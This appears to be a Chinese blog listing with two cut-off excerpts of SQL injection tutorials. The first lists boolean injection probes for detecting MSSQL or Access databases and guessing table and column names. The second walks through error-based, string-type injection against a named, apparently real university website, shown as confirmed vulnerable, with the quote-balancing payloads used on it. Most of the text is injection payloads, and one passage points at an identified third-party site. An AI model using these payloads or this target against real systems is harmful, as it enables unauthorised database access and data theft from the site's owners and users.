如若

摘要： 1.判断是否有注入;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.注入参数是字符and [查询条件] and = 4.搜索时没过滤参数的and [查询条件] and %25= 5.判断数据库系统 ;and (select count(*) from sysobjects)>0 mssql ;and (select count(*) from msysobjects)>0 access 6.猜数据库 ;and (select Count(*) from [数据库名])>0 7.猜字段 ;and (select Count(字段 阅读全文

摘要： mssql显错模式注入（字符型注入） 2.1 基本信息2.1.1 判断存在注入 http://yjsc.ahau.edu.cn/web/InfoKindList.aspx?kind=0103′ 根据加单引号的错误回显，发现是字符型，再通过’ and ’1′=’1′ and ’2′=’2进一步判断。可以想象sql语句可能是：select * from table where string=’0103′，这是一个完整的sql语句，可以构造语句：select * from table where string=’0103′ and ’1′=’1′ and ’2′=’2′，我们添加的语句是：’ and 阅读全文